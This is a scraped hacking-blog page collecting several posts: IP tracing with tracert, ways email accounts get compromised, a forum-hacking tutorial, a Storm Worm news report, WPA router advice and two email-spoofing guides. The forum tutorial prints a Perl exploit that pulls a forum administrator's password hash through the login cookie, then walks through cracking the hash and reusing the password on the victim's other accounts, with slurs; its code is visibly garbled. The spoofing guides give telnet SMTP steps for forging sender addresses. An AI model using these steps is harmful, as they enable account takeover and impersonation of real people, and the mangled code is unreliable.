TCP kick:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED
TCP kick:1040 msgr-sb36.msgr.hotmail.com:1863 ESTABLISHED
TCP kick: ESTABLISHED

The top name in the list is the server’s address for IMing. There could be many of
the second name in the list, as a new connection is made to the server for every
room you are IMing to. You are looking for the address of the remote host in
this table it may be something similar to “host63-7-102-226.ppp.cal.vsnl.com” or “203..64.90.6”.
without the quotation marks.
All you need to do now is to put this address in you IP lookup programe and get the IP of the remote system.

Well 50%of the work is done now. Now you know how to get the IP of a remote system, so its time to trace it down and find some details about the IP.

Tracing an IP is quite simple. You can do it the easy way by using some sweet softwares like Visual Trace 6.0b

[ftp://ftp.visualware.com/pub/vr/vr.exe]

Neotrace

[http://www.neoworx.com/download/NTX325.exe]

or by our way ie. Using MS DOS or any other version of DOS.

Well I suggest you to use DOS and its tracert tool for tracing the IP cause using it will give you a clear conception about the art of tracing an IP and I guarantee that you will feel much satisfied on success than using a silly software. Furthur you will know how things work and how the IP is traced down and the different networks associated in this tracing process.

Let us take a look at tracert tool provided for DOS by Microsoft.

It is a very handy tool for peoples need to trace down an IP.

Just open any DOS windows and type tracert.

C:windows>tracert

Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

Options:

-d Do not resolve addresses to hostnames.

-h maximum_hops Maximum number of hops to search for target.

-j host-list Loose source route along host-list.

-w timeout Wait timeout milliseconds for each reply.

You will now see a description of the tracert command and the switches associated with it.

Well these switches doesn’t makes much difference. All you can do is to increase the timeout in milliseconds by using –w switch if you are using a slow connection and the –d switch if you wish not resolve address to hostnames by default.

By default tracert performs a maximum of 30 hops trace. Using the –h switch you can specify the number of hops to perform.

Now its time for execution.

Let us trace down the IP yahoo.com [216.115.108.243]

TIP: If you have done a long research (I mean a lot) then simply looking at the IP you can figure out some info from it. For example the IP 203.90.68.8 indicates that the system is in India. In India IPs generally begin with 203 and 202

C:WINDOWS>tracert yahoo.com

Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:

1 308 ms 142 ms 127 ms 203.94.246.35

2 140 ms 135 ms * 203.94.246.1

3 213 ms 134 ms 132 ms 203.94.255.33

4 134 ms 130 ms 129 ms 203.200.64.29

5 122 ms 135 ms 131 ms 203.200.87.75

6 141 ms 137 ms 121 ms 203.200.87.15

7 143 ms 170 ms 154 ms vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]

8 565 ms 589 ms 568 ms if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]

9 596 ms 584 ms 600 ms if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]

10 * * * Request timed out.

11 703 ms 701 ms 719 ms if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]

12 694 ms 683 ms 681 ms if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]

13 656 ms 677 ms 700 ms ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]

14 667 ms 673 ms 673 ms ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]

15 653 ms 673 ms 673 ms vl20.bas1.snv.yahoo.com [216.115.100.225]

16 666 ms 676 ms 674 ms yahoo.com [216.115.108.243]

Trace complete.

Note: Here I have traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace, the result will be the same.

Now carefully looking at the results you can figure out many information about yahoo’s server [216.115.108.243]

First packets of data leave my ISP which is at 203.94.246.35 .Similarly you can find out the different routers through which the packets of data are send and received to and from the target system. Now take a look at the 13th line you’ll see that the router is in PaloAlto.Teleglobe.net from this you can easily figure out that the router is in Palo Alto. Now finally look at the target system ie. Yahoo’s server vl20.bas1.snv.yahoo.com . Now you got the address of yahoo’s server. Now put this address in any IP lookup programe and perform and reverse DNS lookup and you will get most of the info about this address,like the place where it is in.

Well another thing you can find out using the tracert tool is that the number of hops (routers) the target system is away from you. In case of tracerouting yahoo.com we find that the target system ie yahoo’s server is 16 hops away from my system. This indicates that there are 16 routers between my system and yahoo’s server.

Apart from tracing an IP you can find out many usefull details about the target system using the tracert tool.

Firewall Detection

While tracerouting a target system, if you get * as an output then it indicates timeout error. Now if you peform another tracerout to the same taeget system at some other time with a good connection and in this way few times more and if you always get * as the output then take it for sure that the target system is running a firewall which prevents sending of data packets from the target system.

Example

Some days ago I tried to tracert hotmail’s server in plain and simple way using tracert without any trick.This is what I found out :

c:windows>tracert 64.4.53.7

Tracing route to lc2.law5.hotmail.com [64.4.53.7]

over a maximum of 30 hops:

1 * * * Request timed out.

2 161 ms 147 ms 85 ms 203.90.69.81

3 126 ms 261 ms 219 ms 203.90.66.9

4 121 ms 115 ms 228 ms delswp2.hclinfinet.com [203.90.66.133]

5 727 ms 725 ms 711 ms 203-195-147-250.now-india.net.in [203.195.147.250]

6 1006 ms 794 ms 952 ms core-fae-0-0.now-india.net.in [203.195.147.3]

7 826 ms 731 ms 819 ms 213.232.106.9

8 885 ms 744 ms 930 ms 213.166.3.209

9 851 ms 1020 ms 1080 ms 213.232.64.54

10 1448 ms 765 ms 1114 ms pos8-0.core2.London1.Level3.net [212.113.0.118]

11 748 ms 789 ms 750 ms ge-4-2-1.mp2.London1.Level3.net [212.187.131.146]

12 719 ms 733 ms 846 ms so-3-0-0.mp1.London2.Level3.net [212.187.128.46]

13 775 ms 890 ms 829 ms so-1-0-0.mp2.Weehawken1.Level3.net [212.187.128.138]

14 853 ms 852 ms 823 ms so-3-0-0.mp1.SanJose1.Level3.net [64.159.1.129]

15 889 ms 816 ms 803 ms so-7-0-0.gar1.SanJose1.Level3.net [64.159.1.74]

16 * * * Request timed out.

17 * * * Request timed out.

18 * * * Request timed out.

19 * * * Request timed out.

20 * * * Request timed out.

21 * * * Request timed out.

22 * * * Request timed out.

23 * * * Request timed out.

24 * * * Request timed out.

25 * * * Request timed out.

26 * * * Request timed out.

27 * * * Request timed out.

28 * * * Request timed out.

29 * * * Request timed out.

30 * * * Request timed out.

Trace complete.

I performed the same tracert many times a day but concluded with the same result. This indicates that the systems after the router SanJose1.Level3.net has firewalls installed which prevents the outgoing of data packets.

Detecting Traceroute Attempts on your System

You can detect that an attacker is performing a traceroute on your system, if you see the following symptoms:

1. If you observe port scans on very high UDP ports. This symptom means that the attacker has performed a traceroute on your system. However, it could also mean a simply port scan. Either way, it signifies the fact that your system is being scanned.

2. If the packet-monitoring tool installed in your network, picks up several outgoing TTL-exceeding messages, then it is yet another sign that someone is doing a traceroute on your system.

3. If in these log files, you also observer an outgoing ICMP port unreachable error message, then it means that since a traceroute was done on your system and as the target system i.e. your system, was reached, it responded with this error message.

You can also find our more information on the attacker (if he performs a traceroute on your system) by simply studying the sniffer log files. If you observer the TTL values, then we can easily figure out the following information on the attacker by making use of OS detection techniques discussed earlier in this white paper:

The Operating System running on the attacker’s target system.
Number of hops away, the attacker is from you.
OKI DOKI Buddys that’s all for this article. Hope you will find this article very easy to understand and implement.
Surely Comment here Okzz!!

Open It

More in Email Hacking [Save your Account]

1 comments

Almost every one of us has heard a friend complaining that his email account has been hacked. Or it may have happened to you. The truth is that hacking yahoo messenger accounts or any other kind of email provider account has become quite a problem for users.
MSN password hacking or hacking yahoo accounts is no longer the realm of experts.

Thanks to the widespread use of the internet, any hacker can learn the required tricks to master the art of hacking yahoo ids or hotmail email password hacking. He only needs to make a basic search with keywords like hacking yahoo passwords, msn messenger hacking tools, msn hacking programs, hacking yahoo mail, hotmail hacking programs, hacking yahoo email or even something as simple as hotmail hacking guide. All of that is out there, ready to be learnt.

Can Emails Be Hacked?

Yes. As a matter of fact, almost anything can be hacked in the Internet. The problem is that email accounts are the repositories were people store their private information or even their business data. It is a quite serious condition and most of the mail providers have taken some measures for stopping it. Unfortunately, users don’t take them seriously and they don’t follow the precautions.

There are several methods for hacking yahoo, msn or AOL email accounts. One of these methods is social engineering. Considered a revolutionary art among the hacker community, it has proven to be an interesting tool that can be exploited by anyone.

Social engineering consists in the ability to trick someone in believing that he is giving information to someone who has the authority to ask for it. The most common way to do it is through the telephone or via the internet. Let’s say that a user receives a call from someone who identifies himself as a system administrator of his company and that he requires some information that could be considered harmless.

It’s quite probable that that bit of information is the final piece that the hacker required for finishing his work. Something as innocent as when was the last time that the system asked the user to change his password could be used by him in his advantage.

A quite ingenious method within social engineering was a webpage were users required to enter their mail and password for finding if someone had deleted or blocked them from their Instant Messenger (IM). Unfortunately, many fell under this scheme. Hacking yahoo messenger or any other messenger is quite easy if you find how to exploit the user’s needs.

Alternatives used

Besides social engineering, hackers can obtain your password through other means, like worms, viruses or Trojans. Once a hacker is inside your computer, he will look for those files
were your login names and passwords are stored. That’s they reason why it isn’t considered
safe to store them inside your computer. Even when the provider tells you that it is safe. Remember than there isn’t a more secure place for keeping your password than your mind.

Methods Used In The Past !

In the past, one of the common practices used by hacker was using programs that tried different password combinations until it found the correct one. This method was contra rested by email providers by giving a limited number of options or by placing some security measures inside their webpage.

Other method was placing false web pages instead of the original ones. A hacker could make a user think that he is accessing his email at the webpage of his email provider. In reality, he was entering all his information to a webpage created by the hacker. This scheme isn’t used any more since users have become a bit more careful and have acquired some concepts on internet security. They have started using secure pages for login which starts

What Are Keyloggers?

Keyloggers are specially devised programs that are installed inside a computer via a Trojan, a virus or a worm. Once inside, the keylogger will auto execute and start recording all the key strokes made by the computer user. Once a determined period of time has gone by, the keylogger will send the keystroke information to the hacker who sent this infectious software.

Then the hacker will start searching key combinations that can lead him to determine the password for determined web pages. This simple and effective method is a favorite among hackers since it can provide them with lots of private information from their victims.

Many computer users have more than one email account, especially if they use the messenger services from multiple providers, like Microsoft’s Hotmail, Yahoo’s Email or AOL email. It doesn’t matter if you have one or many email accounts, every one of them may be a victim of a hacker. Even with the security measures imposed by the companies, Yahoo password hacking or hotmail hacking still exist. And it’s very improbable that will disappear.

So, if you want to protect yourself from people who are hacking yahoo accounts or whose whole purpose in life is to do some MSN hacking, then increase the number of special characters in your password and try not to access your email account from a computer that is not yours. And that goes to IM’s too. The ability for hacking yahoo messenger or any other IM provider it’s a latent danger for all of us.

LOCALLY STORED PASSWORDS

Most browsers, including Internet Explorer® and Netscape®, the AOL® client, and Windows® Dial-Up Connections allow you the option to store passwords. These passwords are stored on the local machine and (depending upon where and how it is stored) there is usually a method of recovering these passwords. Storing any password locally is insecure and may allow the password to be recovered by anyone who has access to the local machine. While we are not currently aware of any program to recover locally stored AOL® passwords, we do not recommend that these are secure. Software does exist that can recover most of the other types of locally stored passwords.

TROJAN

A Trojan is a program that is sent to a user that allows an attacker to control functions of the target computer, recover information from the target or to delete or damage files on the target. The name Trojan is given because the program will usually come attached to some other program or file that entices you to run it. There are a wide variety of Trojans any number of which can be programmed to capture passwords as they are typed and to email or transmit them to a third party. To protect yourself against Trojans, you should never execute or download software or files that are not from a trusted source. It is critical that anyone working on internet use a virus protection program (which should catch most Trojans.) Note that since a Trojan requires the password to be typed or stored in order to be recovered, this is not an effective way to recover your own password. It could explain, however, how someone could lose their password to a hacker. Sending someone a Trojan program is certainly illegal and we do not recommend or condone this activity. A Trojan is unlikely to be effective in recovering a particular account password since it requires the target to install it. However, hackers will often bulk mail Trojans to thousands of people in the hope that a small percentage will get caught. Legitimate account holders who may have been caught by a Trojan and can authenticate themselves should contact their service provider to have their account passwords res

SNIFFING
If two people do not share the same computer, but do share the same network, it may be possible for one to sniff the others’ packets as they sign-on. The traffic between your computer and the internet site you are accessing may be able to be recorded and decrypted or “played-back.” This is not a simple attack to execute, but is possible if two people are close to one another and share a hub. Again, this is likely to be illegal and we do not condone this activity.

Open It

How to HACK into FORUMS

2 comments

This is what you like to call "Hacking a forum".
I call it "Cracking into a forum" ... Learn what hacking means you lazy f*cks, lol...
Note: How Hackers Hack into forum slowly, everything they do, is posted here by steps :
First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be referring to it as "hackingsite".

So you've got your target. You know the forum to want to hack, but how? Let's find the user we want to hack. Typically, you'd want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be "1". Find the User ID of the administrator, or person you wish to hack. For this tutorial, let's say his/her ID is "2".
Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of "hackingsite", which is User ID "2".
Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don't have it, here:

CODE

#!/usr/bin/perl -w
##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
for( $i=1; $i < j="0;" current =" $charset[$j];" sql =" (" cookie =" ('Cookie'"> $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current\n";
last;
}
}
if ( length($outputs) < member_id=" . $user . " pass_hash="">

What the f*ck,Pretty confused, aren't you? What the f*ck are you supposed to do with this shit?! I'll tell you. First of all, this is a Perl script. Copy and paste that code into Notepad.
How can you execute Perl scripts? Well, you can upload them to your CGI-BIN, or you can take my route of preference, and install Perl on your PC.
Your going to want to go and get ActivePerl. I am sure it's here somewhere in Appz.
Open the file up, and let it install. Leave everything on default. In otherwords, just keep hitting "OK".
So now you have Perl installed. Open up "My Computer", and then click on "Local Disk (C:/)". In there, you should see a folder named "Perl". Open up that folder, and within "Perl", you should see another folder named "bin". Open up "bin". Now that your in, drag and drop "ipb.pl" from your desktop, into "bin".
Alrighty. Now everything is fine, and you're ready to Pwn some FAGS ...
What your going to want to do now, is open up your command prompt. If you don't know how, please quit this site, and die.... Start - Run - CMD
Alright, so now your in your command prompt. You want to change the directory in your command prompt to your Perl/bin directory. To do this, type the following into your command prompt, and hit enter:
cd C:\Perl\bin
Good job. Your very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the ipb.pl file. How do we do this? Type the following command into your command prompt:
perl ipb.pl
So, this is what we need to do. Type the following command into your command prompt:
ipb.pl http://hackingsite.com/forum 2 1
Obviously replace "http://hackingsite.com/forum" with the URL to the forum you wish to hack.
Now, this may take a minute. The exploit is gathering information, and grabbing the hash. Numbers/letters will slowly appear down the screen. Don't be alarmed, and allow the program a few minutes. Once the hash grabbing is complete, it will return a full hash, as well as User ID.
Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f
But what can we do with this hash? To you, it just looks like a scramble of numbers and letters. What this is, is an MD5 hash. This is the person's password, encrypted using the MD5 algorithm. I urge you to do a quick read-up on MD5 hash's before continuing reading.
Done? You understand the very basics of MD5s? Good. You're probably thinking: I just read that MD5 hashes cannot be cracked!
LOL.. Indeed, MD5s are impossible to reverse. Once a string is MD5ed, there is no way to get it back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash.
There are many places online where you can enter hashes to be cracked. Personally, I use "Cain & Able", which is a great MD5 cracker available at 'http://odix.it'.
You can use any method, and any crackers to crack this hash. 90% of the hashes I get, I am able to crack. Once you crack the hash, you will be given a plain-text password.
CONGRATS! You now have the victims password! You can now login to his/her account on whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or MSN/AIM account.
But what if the hash is not crackable? You are merely left with a password hash. What can you do with this?
Well, you can spoof your cookie!
If you would like to learn more on spoofing cookies, use the friendly searching site they call "GOOGLE"

Open It

HACKERS USE EUROPEAN STORM TO SPREAD E-MAIL ATTACK

1 comments

A massive malware attack spread throughout the world Thursday and Friday by teasing e-mail recipients to open infected messages supposedly about European wind storms. The attackers use of the subject line "230 dead as storm batters Europe" was an effective way to lure careless computer users into opening mail infected with the "Storm Worm" virus.

"Storm Worm" is the name that seems to have stuck for a massive malware Webroot AntiSpyware 30-Day Free Trial. Click here. attack that spread Thursday and Friday by teasing e-mail E-Mail Marketing Software - Free Trial. Click Here. recipients to open infected messages supposedly about European wind storms.
The attackers use of the subject line "230 dead as storm batters Europe" was an effective way to lure careless computer users into opening mail infected with the Small.DAM Trojan. Fierce winds were battering Europe simultaneously with the release of the messages.
The Trojan was launched when users clicked on attachments to the messages that said "Full Clip.exe," "Full Story.exe," "Read More.exe" and "Video.exe."
Different Variations
However, the perpetrators also sent similarly infected, but differently titled, messages to thousands of other inboxes. These messages titillated readers into clicking the attachments by suggesting they would see videos of U.S. Secretary of State Condoleeza Rice kicking German Chancellor Angela Merkel which, unlike the storm, did not actually happen.
Others offered information or video pertaining to "British Muslims Genocide," "Naked teens attack home director" and "A killer at 11, he's free at 21 and kill again!"
The interesting part of the attack was the creativity and timing, according to Graham Cluley, senior technology consultant for Sophos Latest News about Sophos. "Everyone is concentrating on the storm angle of it, which is only one headline of course," he said. "That was topical in Europe, where we've had some very, very bad weather. But another worthwhile thing to consider is the way they were trying to use humor to get people to open the mail as well."
Many people enjoy reading jokes or weird news tidbits sent by e-mail, Cluley noted. "People who receive that and think they got a video attached to the e-mail might think, 'That sounds funny. I might just click on it to have a look.' This is taking advantage of the way people share jokes and videos. It's not just the news aspect of it. There is all sorts of social engineering going on here."
Topical Messages Enhance Effectiveness
The attack shows that hackers are staying abreast of world news. The European storm message was "created and launched literally as the storm raged," according to Helsinki, Finland-based security company F-Secure Latest News about F-Secure.
The attack was powerful and widespread but, apparently, short-lived, F-Secure's Chief Research Officer Mikko Hypponen told TechNewsWorld.
"This is over," he added. "They stopped the attack. Whoever sent this isn't doing it anymore. Looking at the rate of e-mails being sent, we believe they were targeting European users and it was a nine-hour window starting [Thursday] night and finishing at about 10 a.m. [Friday morning]."
The storm-related message was apparently meant to be awaiting users in the morning, according to Hypponen.
"The people woke up and saw news about a massive storm," he explained. "They went to work and found an e-mail about the storm in their inboxes. Of course it's going to work much better than the usual attack. They gained access to probably tens of thousands of computers in Europe."
Zombie Network
The hackers, before the Thursday-through-Friday attack, had already gained control of thousands of PCs by prior malware infection, Hypponen noted. "They instructed those computers to do this 10-hour spam run. They had a very large [zombie] network See the HP StorageWorks All-in-One Storage System. Click here.. Now it's much larger."
The "huge attack" might have worked too well, in a sense, suggested Sophos' Cluley. "The fact that this is making headlines actually works against the hackers" because so many people and antivirus companies are now aware of the incident, thanks to its creative and "colorful" nature.

Open It

SECURING A WIRELESS NETWORK CONNECTION WITH WEP OR WPA

2 comments

I have just set up a wireless connection at home - whenever I log on it says that the connection is unsecure - how do I secure it? I have a new Toshiba Laptop and a Phillips Router. I saw something about a WEP key....where do I enter this?

You are right to worry about this problem, actually, because any open wireless network is an invitation for neighbors and various unsavory characters to connect to your network as if they were on your local area network. This means that they'd be able to use your network-friendly printer, your networked hard drive backup system, and try to break into your computers too. In addition, they'd be able to use your network connection itself and if they were to download tons of illegal music, for example, the RIAA could get your ISP to shut you down, or if they downloaded porn or terrorism research data, well, the FBI could get involved. Not good!
Fortunately, it's pretty easy to secure a wireless network system: you need to log in to your router / base station (your Phillips unit), which is probably done by simply entering a special IP address in your Web browser (try 192.168.1.1 if the documentation that was included with the router doesn't explain). If that fails, you might need to hook the router directly to the computer via a USB cable, though those are definitely rare systems.
Once you've hooked up, you should find a multi-tab configuration tool that has one tab labeled "Security" or similar. Click on that and you should be able to find "Password" as an option or button. Click on that and it should give the options of WEP or WPA. I recommend that you choose WPA and use a long password - it's far more secure than WEP.
Here's an example from the configuration screen of my Linksys router:

As you can see, it's a bit complicated, but once you enter a password it automatically generates all the scary looking (hexadecimal) security codes: any of those will be what you would enter on your Toshiba laptop -- once -- to be securely connected forever.
I hope that helps you get your hatches battened down!

Open It

Fake Emails Or Email Spoofing in DOS

0 comments

Well, let's get started then. Well in order to fake (spoof) an email, you first need to have an SMTP (Simple Mail Transfer Protocol) server that you can use to send the email from. How do you find one? Simple
First decide what server you want to use to send email from, for this example I will use Hotmail. Now go to Start --> Run --> Type the word 'cmd' without the '
Now that you have DOS open, type the following command:

nslookup -querytype=mx hotmail.com

You can replace hotmail.com with whatever site's mail servers you want to use. Anyway, when you execute that command, the following output comes out:

Non-authoritative answer:
hotmail.com MX preference = 5, mail exchanger = mx2.hotmail.com
hotmail.com MX preference = 5, mail exchanger = mx3.hotmail.com
hotmail.com MX preference = 5, mail exchanger = mx4.hotmail.com
hotmail.com MX preference = 5, mail exchanger = mx1.hotmail.com
The SMTP servers are mx2.hotmail.com, mx3.hotmail.com, etc. Now, for the next part of the tutorial, I will be using mx2.hotmail.com.
Now, let's get started spoofing the actual email! You still have DOS open right, good. Now type the following command to connect with Hotmail's SMTP server. You can replace the server name with your preferred server.
telnet mx2.hotmail.com 25
You will see whatever welcome message they give. Now type the following command:
HELO
You'll get a message, usually with your IP. Now the next command shows what email you want to pretend to be sending from. I'll use the fake email lala@lala.org
MAIL FROM: lala@lala.org
You should get a 250 OK. Now we will type a command to choose who we want the email to go to. I will use the fake email blah@blah.com
RCPT TO: blah@blah.com
Now you get another 250 OK. Now we will start the actual message. Type:
DATA
Then type your message. Be sure to add title headers, like Subject, To, From, etc. so the email looks real. After you are done typing the email, press Enter, then type a . then press Enter again. Your email has been sent!

Now type quit to end the connection to the server.
That's all for now, hope you learned something!

Open It

How To: SEND FAKE EMAILS [Email spoofing]

2 comments

So, you want to learn how to send your own fake mail? It's extraordinarily easy to do, and requires no extra software installed on your PC at all. It can be done with Windows, Macintosh, Linux - any modern PC that has an internet connection will do it.

There are a just a few simple steps. First, you'll need to decide on the FROM and the TO email addresses. If the FROM address that you're choosing isn't a real one, make sure that the domain name(the bit after the @ sign) is a real one. If it's not a real one, it almost certainly won't work.

For the purpose of this tutorial, we'll be sending from bush@whitehouse.gov to dummy@anysite.com.

Second, you'll need to find out the mail server that your recipient is using.

Click Start, Run, enter "CMD", then press OK. In the window that comes up, type nslookup -q=MX anysite.com

Go to Applications, Utilities, and choose Terminal. In the window that comes up, type nslookup -q=MX anysite.com

Bring up your favorite shell, and type nslookup -q=MX anysite.com

There will be a lot of information on the screen - all you need to look for is a line that talks about a mail exchanger. If there are several, pick the one with the lowest "preference number".

anysite.com MX preference = 10, mail exchanger = mail.anysite.com

Now, you'll need to connect to this mail exchanger using telnet. This is the same for any PC, but Vista users may not have it installed by default - see this note about getting telnet on Vista before you continue. When you're ready, type:

telnet mail.anysite.com 25

Press enter, and after a short pause, you should see a welcome message from the server.

Ok, so now you're connected. You need to enter the following information - press ENTER at each new line. You won't be able to press backspace to delete a mistake, so you'll need to type everything correctly first time!

HELO whitehouse.gov

This tells the mail server that we are "whitehouse.gov".

MAIL FROM: </BUSH@WHITEHOUSE.GOV>

This tells the server who is sending the mail.

RCPT TO: </DUMMY@ANYSITE.COM>

This tells the server who to deliver the mail to. At this point, if the recipient doesn't exist, you may see a warning message (but not always).

DATA

This tells the server that we're ready to start writing our message. It should acknowledge, telling you to end your message with a full stop (period) on a single line. All we need to do now, is write our message and don't forget that full stop at the end.

Hello dummy@anysite, I managed to send a fake mail all by myself!
.

Dont forget that last dot. When you've done that, and pressed enter, simply enter QUIT and your mail should be delivered.

There's a little bit more to it, of course. You'll need to enter proper "headers" if you want the mail to look more believable. After doing the DATA command, I'd recommend pasting in the following "headers" to make sure it looks realistic when viewed in Outlook, Hotmail, etc.

Date: Sun, 01 Apr 2007 12:49:13 +0100 (BST)
From: George W Bush
To: Poor Sod
Subject: Fake mail

Hello dummy@anysite, I managed to send a fake mail all by myself!
.
</DUMMY@ANYSITE.COM></BUSH@WHITEHOUSE.GOV>

And that's all there is to it.

Check Out This also : Email Spoofing in DOS

Open It